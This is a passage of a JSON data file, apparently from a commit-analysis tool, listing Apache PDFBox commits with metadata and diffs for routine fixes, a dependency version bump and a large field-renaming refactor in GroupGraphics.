"no-tag", - "acb4cd5ea75f9dc3d2a3aba7c139de5034198daf" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4184", - "relevance": 2 - } - ] - }, - { - "commit_id": "11061a829adc5975527d2f58dd296aa0ff33f55d", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532451776, - "hunks": 3, - "message": "PDFBOX-4276: handle all ExtGState names, not just those with gs and number git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836571 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/preflight/src/main/java/org/apache/pdfbox/preflight/process/reflect/ExtGStateValidationProcess.java b/preflight/src/main/java/org/apache/pdfbox/preflight/process/reflect/ExtGStateValidationProcess.java", - "index d5f549861..11986a755 100644", - "--- a/preflight/src/main/java/org/apache/pdfbox/preflight/process/reflect/ExtGStateValidationProcess.java", - "+++ b/preflight/src/main/java/org/apache/pdfbox/preflight/process/reflect/ExtGStateValidationProcess.java", - "@@ -115,12 +115,9 @@ public class ExtGStateValidationProcess extends AbstractProcess", - " COSName key = (COSName) object;", - "- if (key.getName().matches(TRANSPARENCY_DICTIONARY_KEY_EXTGSTATE_ENTRY_REGEX))", - "+ COSBase gsBase = extGStates.getItem(key);", - "+ COSDictionary gsDict = COSUtils.getAsDictionary(gsBase, cosDocument);", - "+ if (gsDict == null)", - " {", - "- COSBase gsBase = extGStates.getItem(key);", - "- COSDictionary gsDict = COSUtils.getAsDictionary(gsBase, cosDocument);", - "- if (gsDict == null)", - "- {", - "- throw new ValidationException(\"The Extended Graphics State dictionary is invalid\");", - "- }", - "- listOfExtGState.add(gsDict);", - "+ throw new ValidationException(\"The Extended Graphics State dictionary is invalid\");", - " }", - "+ listOfExtGState.add(gsDict);", - " }" - ], - "changed_files": [ - "preflight/src/main/java/org/apache/pdfbox/preflight/process/reflect/ExtGStateValidationProcess.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4276": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "184df397dc2c1b887aa505a613efd4eb9460a181" - ], - [ - "no-tag", - "077d049d0bebb70fd2f27f09b191c4517520a7bc" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4276", - "relevance": 2 - } - ] - }, - { - "commit_id": "9193e379827b2414a3db850ac6215d289493fa25", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532251756, - "hunks": 1, - "message": "PDFBOX-4184: size comparison only for DeviceRGB images git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836431 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "index 3b81dbe43..bebda6ce2 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "@@ -85,3 +85,4 @@ public final class LosslessFactory", - " {", - "- if (pdImageXObject.getBitsPerComponent() < 16 &&", - "+ if (pdImageXObject.getColorSpace() == PDDeviceRGB.INSTANCE &&", - "+ pdImageXObject.getBitsPerComponent() < 16 &&", - " image.getWidth() * image.getHeight() <= 50 * 50)" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4184": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "27381387a031eac6c3f872eb331df45edf93d6ea" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4184", - "relevance": 2 - } - ] - }, - { - "commit_id": "1ba37ac4b778f6e0728ef92924c3775cc16caabf", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527004780, - "hunks": 1, - "message": "PDFBOX-4071: update owasp check to current version git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832040 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 7d1ef8d71..5e35db3a0 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -148,3 +148,3 @@", - " dependency-check-maven", - "- 3.1.2", - "+ 3.2.0", - " " - ], - "changed_files": [ - "parent/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "a831d2c0b474902675235c6e35e720caaf1321a1" - ], - [ - "no-tag", - "5a4c4ccd0a36db2855c67af600ac6b9485ac6308" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "901cfc3a03e8e6c72f923f523f551a22a9fc6b62", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531421953, - "hunks": 1, - "message": "PDFBOX-4071: update javadoc link git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835766 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 86b47b965..bff4a6054 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -183,3 +183,3 @@", - " ", - "- http://download.oracle.com/javase/1.7.0/docs/api/", - "+ https://docs.oracle.com/javase/7/docs/api/", - " " - ], - "changed_files": [ - "parent/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "460bb9d95e1a850f5112a90a290dff0d4d445f31" - ], - [ - "no-tag", - "0243118c3f122e13612e145948ce512da20686b9" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "e4600eef2f3b5e2b82e95a66c16eeb276f1c6997", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528393137, - "hunks": 1, - "message": "PDFBOX-4241: don't close the stream twice, as suggested by Harald Kuhr git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833132 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java b/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java", - "index f906717e0..235ce1eab 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java", - "@@ -300,6 +300,2 @@ public class COSWriter implements ICOSVisitor, Closeable", - " }", - "- if (getOutput() != null)", - "- {", - "- getOutput().close();", - "- }", - " if (incrementalOutput != null)" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdfwriter/COSWriter.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4241": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "63a794e583e2d6e2ab2504255cb5477d011d7300" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4241", - "relevance": 2 - } - ] - }, - { - "commit_id": "960d51d027c468f09ae011d48a018ba39efc1b8e", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531331744, - "hunks": 3, - "message": "PDFBOX-4071: replace deprecated method git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835654 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationHelper.java b/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationHelper.java", - "index e344f61fb..cc1642cd6 100644", - "--- a/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationHelper.java", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationHelper.java", - "@@ -40,3 +40,3 @@ import org.bouncycastle.asn1.x509.GeneralName;", - " import org.bouncycastle.asn1.x509.X509ObjectIdentifiers;", - "-import org.bouncycastle.x509.extension.X509ExtensionUtil;", - "+import org.bouncycastle.cert.jcajce.JcaX509ExtensionUtils;", - "@@ -138,3 +138,3 @@ public class CertInformationHelper", - " {", - "- ASN1Sequence asn1Seq = (ASN1Sequence) X509ExtensionUtil.fromExtensionValue(extensionValue);", - "+ ASN1Sequence asn1Seq = (ASN1Sequence) JcaX509ExtensionUtils.parseExtensionValue(extensionValue);", - " Enumeration objects = asn1Seq.getObjects();", - "@@ -172,3 +172,3 @@ public class CertInformationHelper", - " {", - "- ASN1Sequence asn1Seq = (ASN1Sequence) X509ExtensionUtil.fromExtensionValue(extensionValue);", - "+ ASN1Sequence asn1Seq = (ASN1Sequence) JcaX509ExtensionUtils.parseExtensionValue(extensionValue);", - " Enumeration objects = asn1Seq.getObjects();" - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/signature/validation/CertInformationHelper.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "25b289c050018c4855809c721e7d7127b79f24c4" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "831ca3562c73296a35ffc410a0f08d4558bf0676", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530384240, - "hunks": 75, - "message": "PDFBOX-3000: sonar fix: don't have a class member with the same name as its enclosing class; rename other member as well git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834758 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java b/pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java", - "index b21ca1e6f..d85d7db92 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/rendering/GroupGraphics.java", - "@@ -68,4 +68,4 @@ class GroupGraphics extends Graphics2D", - " private final BufferedImage groupAlphaImage;", - "- private final Graphics2D groupGraphics;", - "- private final Graphics2D alphaGraphics;", - "+ private final Graphics2D groupG2D;", - "+ private final Graphics2D alphaG2D;", - "@@ -74,6 +74,6 @@ class GroupGraphics extends Graphics2D", - " this.groupImage = groupImage;", - "- this.groupGraphics = groupGraphics;", - "+ this.groupG2D = groupGraphics;", - " this.groupAlphaImage = new BufferedImage(groupImage.getWidth(), groupImage.getHeight(),", - " BufferedImage.TYPE_INT_ARGB);", - "- this.alphaGraphics = groupAlphaImage.createGraphics();", - "+ this.alphaG2D = groupAlphaImage.createGraphics();", - " }", - "@@ -84,5 +84,5 @@ class GroupGraphics extends Graphics2D", - " this.groupImage = groupImage;", - "- this.groupGraphics = groupGraphics;", - "+ this.groupG2D = groupGraphics;", - " this.groupAlphaImage = groupAlphaImage;", - "- this.alphaGraphics = alphaGraphics;", - "+ this.alphaG2D = alphaGraphics;", - " }", - "@@ -92,4 +92,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.clearRect(x, y, width, height);", - "- alphaGraphics.clearRect(x, y, width, height);", - "+ groupG2D.clearRect(x, y, width, height);", - "+ alphaG2D.clearRect(x, y, width, height);", - " }", - "@@ -99,4 +99,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.clipRect(x, y, width, height);", - "- alphaGraphics.clipRect(x, y, width, height);", - "+ groupG2D.clipRect(x, y, width, height);", - "+ alphaG2D.clipRect(x, y, width, height);", - " }", - "@@ -106,4 +106,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.copyArea(x, y, width, height, dx, dy);", - "- alphaGraphics.copyArea(x, y, width, height, dx, dy);", - "+ groupG2D.copyArea(x, y, width, height, dx, dy);", - "+ alphaG2D.copyArea(x, y, width, height, dx, dy);", - " }", - "@@ -113,4 +113,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- Graphics g = groupGraphics.create();", - "- Graphics a = alphaGraphics.create();", - "+ Graphics g = groupG2D.create();", - "+ Graphics a = alphaG2D.create();", - " if (g instanceof Graphics2D && a instanceof Graphics2D)", - "@@ -125,4 +125,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.dispose();", - "- alphaGraphics.dispose();", - "+ groupG2D.dispose();", - "+ alphaG2D.dispose();", - " }", - "@@ -132,4 +132,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawArc(x, y, width, height, startAngle, arcAngle);", - "- alphaGraphics.drawArc(x, y, width, height, startAngle, arcAngle);", - "+ groupG2D.drawArc(x, y, width, height, startAngle, arcAngle);", - "+ alphaG2D.drawArc(x, y, width, height, startAngle, arcAngle);", - " }", - "@@ -139,4 +139,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawImage(img, x, y, bgcolor, observer);", - "- return alphaGraphics.drawImage(img, x, y, bgcolor, observer);", - "+ groupG2D.drawImage(img, x, y, bgcolor, observer);", - "+ return alphaG2D.drawImage(img, x, y, bgcolor, observer);", - " }", - "@@ -146,4 +146,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawImage(img, x, y, observer);", - "- return alphaGraphics.drawImage(img, x, y, observer);", - "+ groupG2D.drawImage(img, x, y, observer);", - "+ return alphaG2D.drawImage(img, x, y, observer);", - " }", - "@@ -154,4 +154,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawImage(img, x, y, width, height, bgcolor, observer);", - "- return alphaGraphics.drawImage(img, x, y, width, height, bgcolor, observer);", - "+ groupG2D.drawImage(img, x, y, width, height, bgcolor, observer);", - "+ return alphaG2D.drawImage(img, x, y, width, height, bgcolor, observer);", - " }", - "@@ -161,4 +161,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawImage(img, x, y, width, height, observer);", - "- return alphaGraphics.drawImage(img, x, y, width, height, observer);", - "+ groupG2D.drawImage(img, x, y, width, height, observer);", - "+ return alphaG2D.drawImage(img, x, y, width, height, observer);", - " }", - "@@ -169,4 +169,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, bgcolor, observer);", - "- return alphaGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, bgcolor, observer);", - "+ groupG2D.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, bgcolor, observer);", - "+ return alphaG2D.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, bgcolor, observer);", - " }", - "@@ -177,4 +177,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, observer);", - "- return alphaGraphics.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, observer);", - "+ groupG2D.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, observer);", - "+ return alphaG2D.drawImage(img, dx1, dy1, dx2, dy2, sx1, sy1, sx2, sy2, observer);", - " }", - "@@ -184,4 +184,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawLine(x1, y1, x2, y2);", - "- alphaGraphics.drawLine(x1, y1, x2, y2);", - "+ groupG2D.drawLine(x1, y1, x2, y2);", - "+ alphaG2D.drawLine(x1, y1, x2, y2);", - " }", - "@@ -191,4 +191,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawOval(x, y, width, height);", - "- alphaGraphics.drawOval(x, y, width, height);", - "+ groupG2D.drawOval(x, y, width, height);", - "+ alphaG2D.drawOval(x, y, width, height);", - " }", - "@@ -198,4 +198,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawPolygon(xPoints, yPoints, nPoints);", - "- alphaGraphics.drawPolygon(xPoints, yPoints, nPoints);", - "+ groupG2D.drawPolygon(xPoints, yPoints, nPoints);", - "+ alphaG2D.drawPolygon(xPoints, yPoints, nPoints);", - " }", - "@@ -205,4 +205,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawPolyline(xPoints, yPoints, nPoints);", - "- alphaGraphics.drawPolyline(xPoints, yPoints, nPoints);", - "+ groupG2D.drawPolyline(xPoints, yPoints, nPoints);", - "+ alphaG2D.drawPolyline(xPoints, yPoints, nPoints);", - " }", - "@@ -212,4 +212,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawRoundRect(x, y, width, height, arcWidth, arcHeight);", - "- alphaGraphics.drawRoundRect(x, y, width, height, arcWidth, arcHeight);", - "+ groupG2D.drawRoundRect(x, y, width, height, arcWidth, arcHeight);", - "+ alphaG2D.drawRoundRect(x, y, width, height, arcWidth, arcHeight);", - " }", - "@@ -219,4 +219,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawString(iterator, x, y);", - "- alphaGraphics.drawString(iterator, x, y);", - "+ groupG2D.drawString(iterator, x, y);", - "+ alphaG2D.drawString(iterator, x, y);", - " }", - "@@ -226,4 +226,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawString(str, x, y);", - "- alphaGraphics.drawString(str, x, y);", - "+ groupG2D.drawString(str, x, y);", - "+ alphaG2D.drawString(str, x, y);", - " }", - "@@ -233,4 +233,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.fillArc(x, y, width, height, startAngle, arcAngle);", - "- alphaGraphics.fillArc(x, y, width, height, startAngle, arcAngle);", - "+ groupG2D.fillArc(x, y, width, height, startAngle, arcAngle);", - "+ alphaG2D.fillArc(x, y, width, height, startAngle, arcAngle);", - " }", - "@@ -240,4 +240,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.fillOval(x, y, width, height);", - "- alphaGraphics.fillOval(x, y, width, height);", - "+ groupG2D.fillOval(x, y, width, height);", - "+ alphaG2D.fillOval(x, y, width, height);", - " }", - "@@ -247,4 +247,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.fillPolygon(xPoints, yPoints, nPoints);", - "- alphaGraphics.fillPolygon(xPoints, yPoints, nPoints);", - "+ groupG2D.fillPolygon(xPoints, yPoints, nPoints);", - "+ alphaG2D.fillPolygon(xPoints, yPoints, nPoints);", - " }", - "@@ -254,4 +254,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.fillRect(x, y, width, height);", - "- alphaGraphics.fillRect(x, y, width, height);", - "+ groupG2D.fillRect(x, y, width, height);", - "+ alphaG2D.fillRect(x, y, width, height);", - " }", - "@@ -261,4 +261,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.fillRoundRect(x, y, width, height, arcWidth, arcHeight);", - "- alphaGraphics.fillRoundRect(x, y, width, height, arcWidth, arcHeight);", - "+ groupG2D.fillRoundRect(x, y, width, height, arcWidth, arcHeight);", - "+ alphaG2D.fillRoundRect(x, y, width, height, arcWidth, arcHeight);", - " }", - "@@ -268,3 +268,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.getClip();", - "+ return groupG2D.getClip();", - " }", - "@@ -274,3 +274,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.getClipBounds();", - "+ return groupG2D.getClipBounds();", - " }", - "@@ -280,3 +280,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.getColor();", - "+ return groupG2D.getColor();", - " }", - "@@ -286,3 +286,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.getFont();", - "+ return groupG2D.getFont();", - " }", - "@@ -292,3 +292,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.getFontMetrics(f);", - "+ return groupG2D.getFontMetrics(f);", - " }", - "@@ -298,4 +298,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.setClip(x, y, width, height);", - "- alphaGraphics.setClip(x, y, width, height);", - "+ groupG2D.setClip(x, y, width, height);", - "+ alphaG2D.setClip(x, y, width, height);", - " }", - "@@ -305,4 +305,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.setClip(clip);", - "- alphaGraphics.setClip(clip);", - "+ groupG2D.setClip(clip);", - "+ alphaG2D.setClip(clip);", - " }", - "@@ -312,4 +312,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.setColor(c);", - "- alphaGraphics.setColor(c);", - "+ groupG2D.setColor(c);", - "+ alphaG2D.setColor(c);", - " }", - "@@ -319,4 +319,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.setFont(font);", - "- alphaGraphics.setFont(font);", - "+ groupG2D.setFont(font);", - "+ alphaG2D.setFont(font);", - " }", - "@@ -326,4 +326,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.setPaintMode();", - "- alphaGraphics.setPaintMode();", - "+ groupG2D.setPaintMode();", - "+ alphaG2D.setPaintMode();", - " }", - "@@ -333,4 +333,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.setXORMode(c1);", - "- alphaGraphics.setXORMode(c1);", - "+ groupG2D.setXORMode(c1);", - "+ alphaG2D.setXORMode(c1);", - " }", - "@@ -340,4 +340,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.translate(x, y);", - "- alphaGraphics.translate(x, y);", - "+ groupG2D.translate(x, y);", - "+ alphaG2D.translate(x, y);", - " }", - "@@ -347,4 +347,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.addRenderingHints(hints);", - "- alphaGraphics.addRenderingHints(hints);", - "+ groupG2D.addRenderingHints(hints);", - "+ alphaG2D.addRenderingHints(hints);", - " }", - "@@ -354,4 +354,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.clip(s);", - "- alphaGraphics.clip(s);", - "+ groupG2D.clip(s);", - "+ alphaG2D.clip(s);", - " }", - "@@ -361,4 +361,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.draw(s);", - "- alphaGraphics.draw(s);", - "+ groupG2D.draw(s);", - "+ alphaG2D.draw(s);", - " }", - "@@ -368,4 +368,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawGlyphVector(g, x, y);", - "- alphaGraphics.drawGlyphVector(g, x, y);", - "+ groupG2D.drawGlyphVector(g, x, y);", - "+ alphaG2D.drawGlyphVector(g, x, y);", - " }", - "@@ -375,4 +375,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawImage(img, op, x, y);", - "- alphaGraphics.drawImage(img, op, x, y);", - "+ groupG2D.drawImage(img, op, x, y);", - "+ alphaG2D.drawImage(img, op, x, y);", - " }", - "@@ -382,4 +382,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawImage(img, xform, obs);", - "- return alphaGraphics.drawImage(img, xform, obs);", - "+ groupG2D.drawImage(img, xform, obs);", - "+ return alphaG2D.drawImage(img, xform, obs);", - " }", - "@@ -389,4 +389,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawRenderableImage(img, xform);", - "- alphaGraphics.drawRenderableImage(img, xform);", - "+ groupG2D.drawRenderableImage(img, xform);", - "+ alphaG2D.drawRenderableImage(img, xform);", - " }", - "@@ -396,4 +396,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawRenderedImage(img, xform);", - "- alphaGraphics.drawRenderedImage(img, xform);", - "+ groupG2D.drawRenderedImage(img, xform);", - "+ alphaG2D.drawRenderedImage(img, xform);", - " }", - "@@ -403,4 +403,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawString(iterator, x, y);", - "- alphaGraphics.drawString(iterator, x, y);", - "+ groupG2D.drawString(iterator, x, y);", - "+ alphaG2D.drawString(iterator, x, y);", - " }", - "@@ -410,4 +410,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.drawString(str, x, y);", - "- alphaGraphics.drawString(str, x, y);", - "+ groupG2D.drawString(str, x, y);", - "+ alphaG2D.drawString(str, x, y);", - " }", - "@@ -417,4 +417,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.fill(s);", - "- alphaGraphics.fill(s);", - "+ groupG2D.fill(s);", - "+ alphaG2D.fill(s);", - " }", - "@@ -424,3 +424,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.getBackground();", - "+ return groupG2D.getBackground();", - " }", - "@@ -430,3 +430,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.getComposite();", - "+ return groupG2D.getComposite();", - " }", - "@@ -436,3 +436,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.getDeviceConfiguration();", - "+ return groupG2D.getDeviceConfiguration();", - " }", - "@@ -442,3 +442,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.getFontRenderContext();", - "+ return groupG2D.getFontRenderContext();", - " }", - "@@ -448,3 +448,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.getPaint();", - "+ return groupG2D.getPaint();", - " }", - "@@ -454,3 +454,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.getRenderingHint(hintKey);", - "+ return groupG2D.getRenderingHint(hintKey);", - " }", - "@@ -460,3 +460,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.getRenderingHints();", - "+ return groupG2D.getRenderingHints();", - " }", - "@@ -466,3 +466,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.getStroke();", - "+ return groupG2D.getStroke();", - " }", - "@@ -472,3 +472,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.getTransform();", - "+ return groupG2D.getTransform();", - " }", - "@@ -478,3 +478,3 @@ class GroupGraphics extends Graphics2D", - " {", - "- return groupGraphics.hit(rect, s, onStroke);", - "+ return groupG2D.hit(rect, s, onStroke);", - " }", - "@@ -484,4 +484,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.rotate(theta);", - "- alphaGraphics.rotate(theta);", - "+ groupG2D.rotate(theta);", - "+ alphaG2D.rotate(theta);", - " }", - "@@ -491,4 +491,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.rotate(theta, x, y);", - "- alphaGraphics.rotate(theta, x, y);", - "+ groupG2D.rotate(theta, x, y);", - "+ alphaG2D.rotate(theta, x, y);", - " }", - "@@ -498,4 +498,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.scale(sx, sy);", - "- alphaGraphics.scale(sx, sy);", - "+ groupG2D.scale(sx, sy);", - "+ alphaG2D.scale(sx, sy);", - " }", - "@@ -505,4 +505,4 @@ class GroupGraphics extends Graphics2D", - " {", - "- groupGraphics.setBackground(color);", - "- alphaGraphics.setBackground(color);", - "+ groupG2D.setBackground(color);", - "+ alphaG2D.setBackground(color);", - " }", - "@@ -512,4 +512,4 @@ class 